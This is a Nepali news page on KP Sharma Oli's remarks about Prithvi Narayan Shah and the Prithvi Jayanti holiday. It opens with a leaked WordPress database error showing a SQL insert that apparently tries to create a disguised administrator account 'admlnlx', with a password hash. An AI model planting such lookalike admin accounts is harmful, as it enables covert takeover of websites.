WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BT0d8/JuaekwGmWsb/Yxd.XOB3Jz47/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 19:42:36', '', 'admlnlx', 'admlnlx')
काठमाडौं,पुस २७-
नेकपा एमालेका अध्यक्ष केपी शर्मा ओलीले पृथ्वीनारायण शाह राष्ट्रनायक भएको बताएका छन् । साथै आफू प्रधानमन्त्री हुँदा पृथ्वी जयन्तीमा विदा दिन चाहेपनि माओवादीका कारण सम्भव नभएको बताए ।
पृथ्वी जयन्तीको अवसरमा राष्ट्रिय प्रजातन्त्र पार्टीले गरेको चियापान कार्यक्रममा पुगेका एमाले अध्यक्ष ओलीले पृथ्वीनारायणको अभियानलाई अघि बढाउनु पर्ने बताए ।
पूर्वप्रधानमन्त्री समेत रहेका ओलीले आफू प्रधानमन्त्री हुँदा पृथ्वी जयन्तीमा विदा दिन खोजेको तर, सत्तारुढ दलहरुबीच सहमति हुन नसकेको बताए । माओवादीतर्फ लक्षित गर्दै ओलीले भने, ‘अहिले त्यही दल सरकारको नेतृत्वमा छ ।’